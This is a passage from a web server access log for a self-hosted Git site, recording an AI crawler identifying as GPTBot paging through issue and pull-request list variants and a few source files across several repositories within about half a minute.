+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" -[17/Feb/2026:19:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:19:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 38602] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" -[17/Feb/2026:19:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fwarn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 20438] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:19:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 907] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11289] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:19:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72017] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr 